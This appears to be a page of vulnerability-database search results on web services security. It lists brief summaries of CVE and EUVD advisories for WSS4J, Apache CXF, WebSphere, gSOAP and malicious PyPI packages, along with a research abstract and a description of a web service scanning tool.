CVE-2026-40996 Inbound WS-Security allows RSA PKCS#1 v1.5 key transport by default

Wss4jSecurityInterceptor defaulted allowRSA15KeyTransportAlgorithm to true, overriding Apache WSS4J's safer default for validation RequestData. Inbound WS-Security decryption could therefore accept RSA PKCS1 v1.5 rsa-15 encrypted key material unless operators explicitly reconfigured the flag...

CVE-2026-40994 Wss4jSecurityInterceptor disables WS-I BSP validation by default

Wss4jSecurityInterceptor initialized its BSP WS-I Basic Security Profile compliance flag so that inbound validation disabled WSS4J BSP enforcement on RequestData. Services that validate WS-Security on the network could therefore accept messages that violate BSP rules, weakening protocol-level...

CVE-2026-9319

IBM WebSphere Application Server 9.0, and 8.5 is vulnerable to potential remote code execution due to deserialization of untrusted data via JAX-WS endpoints with WS-Security...

BLADE: Behavior-Level Anomaly Detection Using Network Traffic in Web Services

With their widespread popularity, web services have become the main targets of various cyberattacks. Existing traffic anomaly detection approaches focus on flow-level attacks, yet fail to recognize behavior-level attacks, which appear benign in individual flows but reveal malicious purpose using...

EUVD-2019-16962

Malware in sbrugna...

EUVD-2021-1660

Malware in sbrugna...

EUVD-2020-17844

Malware in sbrugna...

EUVD-2024-0599

Malicious code in bioql PyPI...

EUVD-2023-0918

Malicious code in bioql PyPI...

EUVD-2022-4587

Malicious code in bioql PyPI...

Apache CXF 代码问题漏洞

Apache CXF is the United States Apache Apache Foundation of an open source Web services framework. The framework supports a variety of Web services standards , a variety of front-end programming APIs and so on. A code issue vulnerability exists in Apache CXF versions prior to 3.5.5 and 3.4.10,...

br.net.woodstock.rockframework:rockframework-web (>=1.2.1 <=1.2.2), com.cybersource:cybersource-sdk-java (>=6.0.1 <=6.1.0) +333 more potentially affected by CVE-2015-0226 via org.apache.ws.security:wss4j (>=1.5.2 <=1.6.16)

org.apache.ws.security:wss4j MAVEN version =1.5.2, =1.2.1, =6.0.1, =1.0.1, =1.1.0.Beta5, =1.1.0.Beta5, =1.1.0.Beta5, =1.1.0.Beta1, =1.0.0, =1.2.0 and more Source cves: CVE-2015-0226 Source advisory: OSV:GHSA-VJWC-5HFH-2VV5...

br.net.woodstock.rockframework:rockframework-web (>=1.2.1 <=1.2.2), com.cybersource:cybersource-sdk-java (>=6.0.1 <=6.1.0) +333 more potentially affected by CVE-2014-3623 via org.apache.ws.security:wss4j (>=1.5.2 <=1.6.16)

org.apache.ws.security:wss4j MAVEN version =1.5.2, =1.2.1, =6.0.1, =1.0.1, =1.1.0.Beta5, =1.1.0.Beta5, =1.1.0.Beta5, =1.1.0.Beta1, =1.0.0, =1.2.0 and more Source cves: CVE-2014-3623 Source advisory: OSV:GHSA-99V3-9X35-C5VF...

com.fluxcorp.plugins:webservice-trigger (>=1.0.2 <=1.0.4), com.github.mkluas:web-admin (>=1.0.0 <=1.1.0) +66 more potentially affected by CVE-2014-0034 via org.apache.cxf:cxf-rt-ws-security (>=2.0.6 <=2.6.11)

org.apache.cxf:cxf-rt-ws-security MAVEN version =2.0.6, =1.0.2, =1.0.0, =1.0.0, =1.0.0, =1.0.0, =4.0.3, =2.5.0, =2.5.0, =2.5.0, =2.1.7, =2.5.0, =2.6.11 and more Source cves: CVE-2014-0034 Source advisory: OSV:GHSA-38X2-FP9M-87MX...

UBUNTU-CVE-2020-13577

A denial-of-service vulnerability exists in the WS-Security plugin functionality of Genivia gSOAP 2.8.107. A specially crafted SOAP request can lead to denial of service. An attacker can send an HTTP request to trigger this vulnerability...

PT-2020-6525 · Genivia · Gsoap

Name of the Vulnerable Software and Affected Versions: Genivia gSOAP version 2.8.107 Description: A denial-of-service issue exists in the WS-Security plugin functionality of Genivia gSOAP. It can be triggered by a specially crafted SOAP request, allowing an attacker to send an HTTP request and...

CVE-2020-12606

DB Soft SGLAC prior to 20.05.001 is affected. The vulnerability resides in the ProcedimientoGenerico method of the SVCManejador.svc webservice, enabling an attacker to execute arbitrary SQL commands on the SQL Server via xp_cmdshell. CVSS details in the provided data indicate a high/critical impa...

WSSAT v2.0 - Web Service Security Assessment Tool

WSSAT is an open source web service security scanning tool which provides a dynamic environment to add, update or delete vulnerabilities by just editing its configuration files. This tool accepts WSDL address list as input file and for each service, it performs both static and dynamic tests again...

Web Service Security Assessment Tool: WSSAT

WSSAT is an open source web service security scanning tool which provides a dynamic environment to add, update or delete vulnerabilities by just editing its configuration files. This tool accepts WSDL address list as input file and for each service, it performs both static and dynamic tests again...

OpenJDK: insecure XML parsing in wsdlimport (JAX-WS, 8182054)

It was discovered that the wsdlimport tool in the JAX-WS component of OpenJDK did not use secure XML parser settings when parsing WSDL XML documents. A specially crafted WSDL document could cause wsdlimport to use an excessive amount of CPU and memory, open connections to other hosts, or leak...